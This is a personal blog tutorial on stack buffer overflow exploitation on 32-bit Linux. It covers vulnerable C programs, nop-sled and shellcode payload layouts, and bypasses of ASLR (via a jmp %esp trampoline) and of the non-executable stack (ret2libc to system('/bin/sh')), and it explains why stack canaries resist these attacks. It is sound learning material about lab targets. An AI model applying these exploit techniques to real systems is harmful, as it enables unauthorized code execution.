Smashing the stack, mainly for fun and no profit

Thursday, July 21st, 2016

The basics

Stack buffer overflows are one of the most common types of security vulnerability. Mudge and Elias Levy/Aleph One published papers 20 years ago about how to exploit them and gain code execution (i.e. redirect program flow to your own code). This is now harder, but the basic problem of lack of memory safety in C and its descendants is still with us. I’ve been learning the basics of writing stack buffer overflow exploits and how to get around some of the modern defenses against them. This is a distillation of my notes to myself, which breaks no new ground, but may as well be on the internet in case it helps someone else.

My writeup here assumes basic familiary with C, x86 assembly, and gdb. Unfortunately, you’ll definitely need the first two if you want to get started with this kind of exploitation in general. This was all done on Ubuntu 12.04 32-bit with gcc 4.6.3, though it should all be pretty similar on another 32-bit Ubuntu install.

A good place to start for an even simpler demo than Mudge’s paper is this Computerphile video. That will show you the basics of how to use gdb to find what you need to exploit this simple program:

#define BUFSIZE 500
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    strcpy(buf, argv[1]);
    return 0;
}

The basic principle is that we are going to overwrite the saved %eip on the stack, so when main() returns, it jumps to the address we want, which will contain the code we want to execute. In this basic formulation, we will write both our shellcode and the address to execute all in one step. We will exploit this program by feeding all this data in as the argument, which strcpy helpfully writes to the stack for us.

In order for this simple technique to work, we need to disable three protections against stack buffer overflows: ASLR, the stack canary, and the non-executable stack. More details follow later, but the main things to do are this:

$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ gcc buf_overflow.c -o buf_overflow.out -g -z execstack -fno-stack-protector

The first command tells the kernel to disable ASLR when loading programs. When building with gcc, the -z flag tells the linker to mark the stack pages as executable, which they normally aren’t, and -fno-stack-protector omits the canary checking code.

As an aside, you will probably want to enable core dumps so you can examine the state of the process when it crashes if your exploit is not quite right:

$ ulimit -C unlimited

Here’s main()’s stack frame:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

Our exploit will be written in to buf, starting at the low address and going up from there. We need to precisely position all our malicious bytes so that the return address exactly lines up with the saved %eip, and that address points to the part of the stack where our shellcode is. The exact location of &buf may not quite be %esp or %ebp – 500; the compiler is free to put other local variables on the stack and arrange things however it likes, and it has to align some variables to 4-byte word boundaries. This is why you have to play around in gdb to examine the stack and find the exact addresses you need.

A basic exploit technique that slightly loosens the requirements for preceise addresses is the nop sled. Putting a huge chunk of nop instructions (technically “xchg eax, eax”, opcode 0x90) in front of the shellcode means you can jump anywhere in that region and execution will proceed to the beginning of the actual code. Our exploit will look roughly like this:

--------------------------------------------------------------
| 0x90 x ~475 | ~25b shellcode | new %ebp ptr | new %eip ptr |
--------------------------------------------------------------

Replacing the saved %ebp with a real value may not be necessary, depending on the shellcode you are using. If you are really hardcore, you can write some yourself, but you probably won’t be l337 enough to run execve(“/bin/sh”) in 23 bytes, so you might want to use this one. In this case, you don’t need to set %ebp, but you may need to set %esp, since the shellcode uses that register, and returning from main() may set it to a place you don’t want. Perhaps you can find some other shellcode that doesn’t have this problem, or you can add an instruction to set %esp somewhere safe. In gdb, I found that 0xBFFFF310 was a good spot, since that’s where %esp was set for main().

mov 0xBFFFF310, %esp

This assembles to 0xBC 0x10 0xF3 0xFF 0xBF (remember, x86 is little endian, so don’t get your hex bytes backwards within a word). Again, if you can write assembly, maybe you can do this without hardcoding the address. We do have to hardcode the return address, though. Since we have the %esp address from main() here, we should be able to jump into the middle of the nop sled above there, let’s say 0xBFFFF410. So here is the exploit:

--------------------------------------------------------------------------
| 0x90 x 480 | 0xBF 0xBFFFF310 | 23b shellcode | 0x90909090 | 0xBFFFF410 |
--------------------------------------------------------------------------

You can generate that input with Python, as in the Computerphile video, or write it out in a hex editor. Running it should open a new shell, rather than returning you to the one you came from.


A more realistic example

We can use almost the same exploit for a slightly more complicated program:

#define BUFSIZE 500
void read_file(int fd, char *buf, size_t bufsize) {
    size_t r;
    do {
        r = read(fd, buf, bufsize); // bad: must decrement bufsize
        buf += r;
    } while (r > 0);
}
int main(int argc, char **argv) {
    char buf[BUFSIZE];
    int fd;
    if (argc != 2) {
        printf("Usage: buf_overflow_file filename");
        exit(1);
    }
    fd = open(argv[1], O_RDONLY);
    read_file(fd, buf, BUFSIZE);
    printf("The file says: \n\n%s\n", buf);
    return 0;
}

This program takes a filename argument, reads the file into a buffer, and prints it. But it does the buffer length check incorrectly in read_file(), so we can overflow the buffer in main()’s stack frame, even though the read occurs in a different function. Nothing is substantially different in this version of the exploit, except slightly different addresses and stack placement, since there is an extra stack variable in main()’s frame.

--------------------------------------------------------------------------
| 0x90 x 484 | 0xBF 0xBFFFF110 | 23b shellcode | 0x90909090 | 0xBFFFF200 |
--------------------------------------------------------------------------

Basic defense: ASLR

These simplified techniques don’t actually work on a modern Linux system. Any combination of ASLR, a non-executable stack, and a stack canary would defeat the simple version. In isolation, though, we can still get around some of those protections. First, we re-enable ASLR.

$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

If the location of the stack is randomized on each execution, hardcoded stack addresses won’t be any good. Instead, we need to write our shellcode in a place we can get to reliably every time, and somehow transfer execution there. A good place is %esp, since its location is easy to predict. At the time the exploit is written to the stack, %esp points below the write location, but when the vulnerable function returns, %esp will point above that stack frame. Directly above, in fact, immediately next to the return address. So we can rearrange the exploit like this:

-----------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | exploit %eip | 23b shellcode |
-----------------------------------------------------------

Now we know that %esp will point at the shellcode when main() returns, but we need to transfer execution to %esp. So we need to execute:

jmp %esp

The opcode for this is 0xE4FF. Since we control the compilation of this vulnerable program, we could add a new function:

void jmp_esp() {
    __asm__("jmp %esp");
}

But that’s not very realistic. This is not an instruction that is likely to occur in a real program. But we don’t actually need "jmp %esp", all we really need is 0xE4FF. This 2-byte value is much more likely to occur in a large executable somewhere, not even necessarily in the .text section. The processor doesn’t care whether 0xE4FF is supposed to mean “jmp %esp” or the decimal number 58623 or any other interpretation of bits — as long as %eip points to some location storing 0xE4FF, the processor will jump to %esp.

So let’s just add this simpler bit of code to our executable:

int jmp_esp = 0xE4FF;

Now that we know this 2-byte sequence will occur in the binary, we can return to its static location and transfer execution to our shellcode. Find the location in the binary:

$ objdump -D buf_overflow_aslr.out | grep 'ff e4'
    8048467: ff e4 jmp *%esp

As far as the disassembler is concerned, that code must be an instruction, which is what we’re going for, even though the value is in the .data section.

So here’s the new exploit file to bypass ASLR:

---------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048467 | 23b shellcode |
---------------------------------------------------------

Don’t forget, the little endian CPU needs to read your 0x8048467 address as 0x67 0x84 0x04 0x08. And as always, you’ll need to tune the size of the (unused) nop sled to properly position the return address and shellcode, depending on exactly how the compiler sets up the stack frame.


Another defense: non-executable stack

This ASLR bypass relies on the stack pages being marked executable by the linker instruction “-z execstack”. If the executable has been built without that flag, as it should be, you will get a segfault when trying to execute instructions at stack addresses. We can also get around this problem on its own, by executing existing code somewhere else. Functions in the C standard library (libc) are a popular choice, especially if the system() function has been linked in to the binary. system() runs its argument in a shell, which lets you run basically anything you want.

We have to make sure the linker includes a reference to this function in our executable:

void never_called() {
    system(null);
}

In this example, we do not have ASLR enabled. So, the address of the system() function will be very easy to find.

$ objdump -D buf_overflow_exec.out | grep 'system'
    08048390 <[email protected]>:
    80484a8: e8 e3 fe ff ff call 8048390 <[email protected]>

We need to return to 0x08048390 to call system(), which is easy enough, but we also need to set things up in the way it expects. Under normal circumstances, when a function is called, %esp points to the saved %eip value on the stack, which the caller put there, as well as the arguments to the function. system() takes one argument, a path to the executable to call. In our case, we want that to be another shell, i.e. “/bin/sh”. If you are writing this string out in a hex editor, you do not need to do anything differently for it to be written in little endian order; its natural representation is little endian, i.e. “ABCD” = 0x41 0x42 0x43 0x44.

We control the stack, so we can write this string there, and then we need to give a pointer to that location to system(). Our exploit will look something like this:

---------------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | ptr to next byte | "/bin/sh\0" |
---------------------------------------------------------------------------------------
                                          ^ "%eip"     ^ system() arg     ^ pointee

When system() returns, the program will segfault, unless the page containing 0xAAAAAAAA just happens to be executable, in addition to actually existing. To avoid that, you can put a real address there, but it might still crash since the stack won’t be set up properly.

To find the pointer we need to pass to system(), run the exploit in gdb and see where “/bin/sh” ends up. You can set a breakpoint in main() and examine the stack. Or, you can find %ebp within main() and try to use an address relative to that. Something like:

$ gdb buf_overflow.out
break main
run some-file
p $ebp

If the exploit is structured correctly, the string will be at %ebp + 16 (i.e. %ebp + 0x10). For example, if %ebp within main() is 0xBFFFF318, set the pointer to 0xBFFFF328.

---------------------------------------------------------------------------------
| 0x90 x ~500 | 0x90909090 | 0x08048390 | 0xAAAAAAAA | 0xBFFFF328 | "/bin/sh\0" |
---------------------------------------------------------------------------------

Now you will return to system() and it will call /bin/sh for you.


More than the sum of their parts

Unfortunately, the last two exploit techniques can’t easily be combined. My non-executable stack bypass relies on knowing the exact location of some text on the stack, so we can write a static pointer to it. The ASLR bypass relies on writing some code to the stack, which we execute. The linking table is not usually randomized in Linux, so we can still call system() when ASLR is on, but it’s tough to give it the right argument. Perhaps if an executable happened to contain the string “/bin/sh” in a static location, we could pass that location to system() when ASLR is enabled; this seems pretty unlikely.

Therefore, these two defenses are reasonably effective in combination against this simple kind of attack. There are other attacks against ASLR, though, and more sophisticated return-oriented-programming (ROP) can still get around the non-executable stack. These bypass techniques are further than I’ve gone so far, but apparently they are pretty useful.

I have not yet gotten in to heap buffer overflows, but there’s another class of bug that is apparently popular to exploit now. Regarding ROP and ASLR, I recently met David Williams-King, who is working on a new type of ASLR that uses a table of pointers that is constantly moved around, every few milliseconds, rather than simply randomizing the entire address space once. Perhaps this academic research will eventually find its way into the wild and make ROP even harder.


A bigger show stopper: the stack canary

An especially effective defense that I have so far avoided is the stack canary, stack cookie, or as gcc calls it, the stack-smashing protector (SSP). The canary is a random value written on the stack between any buffers and the saved pointers. When the function returns, it checks the canary location against the known value, and if it doesn’t match, this suggests that the return address has been smashed, so it quits. With the canary enabled, our stack frame would look like this:

0xFFFFFFFF
...
------------------------
| char ** argv         | <-- %ebp + 12
------------------------
| int argc             | <-- %ebp + 8
------------------------
| saved %eip           |
------------------------
| saved %ebp           | <-- %ebp
------------------------
| 4 random bytes       | <-- canary
------------------------
| ...                  |
| buf                  | <-- %ebp - 500 = %esp
------------------------
...
0x08040000

The canary-handling code is generated by the compiler, if you use the flag -fstack-protector, which is the default. If you disassemble main(), you’ll see the code that writes and then checks the canary:

0x080484fb <+0>: push %ebp
0x080484fc <+1>: mov %esp,%ebp
0x080484fe <+3>: and $0xfffffff0,%esp
0x08048501 <+6>: sub $0x220,%esp
0x08048507 <+12>: mov 0xc(%ebp),%eax
0x0804850a <+15>: mov %eax,0x1c(%esp)
0x0804850e <+19>: mov %gs:0x14,%eax
0x08048514 <+25>: mov %eax,0x21c(%esp)
0x0804851b <+32>: xor %eax,%eax
0x0804851d <+34>: cmpl $0x2,0x8(%ebp)
0x08048521 <+38>: je 0x804853c <main+65>
0x08048523 <+40>: mov $0x8048684,%eax
0x08048528 <+45>: mov %eax,(%esp)
0x0804852b <+48>: call 0x80483b0 <[email protected]> 0x08048530 <+53>: movl $0x1,(%esp)
0x08048537 <+60>: call 0x80483e0 <[email protected]>
0x0804853c <+65>: mov 0x1c(%esp),%eax
0x08048540 <+69>: add $0x4,%eax
0x08048543 <+72>: mov (%eax),%eax
0x08048545 <+74>: movl $0x0,0x4(%esp)
0x0804854d <+82>: mov %eax,(%esp)
0x08048550 <+85>: call 0x80483f0 <[email protected]>
0x08048555 <+90>: mov %eax,0x24(%esp)
0x08048559 <+94>: movl $0x1f4,0x8(%esp)
0x08048561 <+102>: lea 0x28(%esp),%eax
0x08048565 <+106>: mov %eax,0x4(%esp)
0x08048569 <+110>: mov 0x24(%esp),%eax
0x0804856d <+114>: mov %eax,(%esp)
0x08048570 <+117>: call 0x80484cb
0x08048575 <+122>: mov $0x80486a6,%eax
0x0804857a <+127>: lea 0x28(%esp),%edx
0x0804857e <+131>: mov %edx,0x4(%esp)
0x08048582 <+135>: mov %eax,(%esp)
0x08048585 <+138>: call 0x80483b0 <[email protected]> 0x0804858a <+143>: mov $0x0,%eax
0x0804858f <+148>: mov 0x21c(%esp),%edx
0x08048596 <+155>: xor %gs:0x14,%edx
0x0804859d <+162>: je 0x80485a4 <main+169>
0x0804859f <+164>: call 0x80483c0 <[email protected]>
0x080485a4 <+169>: leave
0x080485a5 <+170>: ret

So the canary value comes from gs:0x14, which is the struct pthread thread descriptor (info, code). Once generated, it is a static value, so what we need to do it copy it from gs:0x14 back to %esp + 0x21C after smashing the original value. But copying that value requires code execution, which we are trying to achieve. We’re stuck.

Previous versions of canary bypass have targeted locations besides the saved %eip, like other local pointers that happened to be above the buffer, or the function’s arguments. But the current SSP is smart enough to reorganize the stack frame such that all the buffers are near the top, all the locals are below them, and arguments are copied below the buffers before using them. Thanks IBM!

On Windows, the stack canary works via SEH, so if you can overwrite the exception handler, you you might be able to get control that way (or you can cause an exception before the canary is checked, if you control the SEH record). A good resource on Windows defenses and bypasses is at Corelan.be.

Canary checking is more straightforward with Linux/gcc, though, so we don’t have an easy workaround. For a trickier attack, consider that the value is not reset if the process fork()s, as a server might do without calling exec(), so this might give you a chance to guess the same value repeatedly. On a 32-bit system, the value is brute forceable this way, but not every process fork()s, and few servers would still be 32 bit these days. This paper proposes a defense against the forking attack.

There is still some remote chance of corrupted data if there are multiple buffers in the stack frame, and the higher one stores pointers or some other exploitable data, and the lower one can overflow into it. You may be able to make other parts of the program misbehave by manipulating this data. But that’s not the case in our simple example. You might find this more useful in C++ objects, which contain function pointers, and may be on the stack! To dig deeper here, heap overflows and use-after-free bugs on the heap generally target C++ objects and their function pointers, but this is a whole other topic.

I heard a talk by Mudge at Summercon this weekend where he stressed that “we have to get beyond controlling the instruction pointer”; that is, a lot of critical systems can be disrupted without executing your own code. Think of industrial systems or infrastructure: you don’t need to run malware on the power grid, you just need to crash the program to turn the lights off. His example was an oil drilling rig: if the drill stops, the molten earth solidifies around it, knocking it offline for at least a year. Defense systems are another example where denial-of-service is nearly as bad as code execution (which can, itself, of course cause DOS). The stack canary is no use in these cases; the buffer overflow still happens and causes the program to crash.

In the case of your PC or server, though, where crashing is not that terrible, the stack canary is a pretty good defense. I haven’t read of any techniques to reliably rewrite the canary value in all cases, i.e. cases where you can’t fork(). If that changes, I’ll update this.


Putting it all together

Here are some good walkthroughs on how to bypass these defenses in practice, in a situation where it is in fact possible (e.g. server process that calls fork(), and the ability to call usleep() to learn the base address of libc).

Leave a Reply

Your email address will not be published. Required fields are marked *